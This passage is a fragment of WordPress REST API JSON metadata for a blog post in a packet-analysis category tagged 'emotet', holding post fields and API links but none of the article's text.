 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[12],"class_list":["post-1517","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-emotet"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1517"}],"version-history":[{"count":13,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1517\/revisions"}],"predecessor-version":[{"id":1553,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1517\/revisions\/1553"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}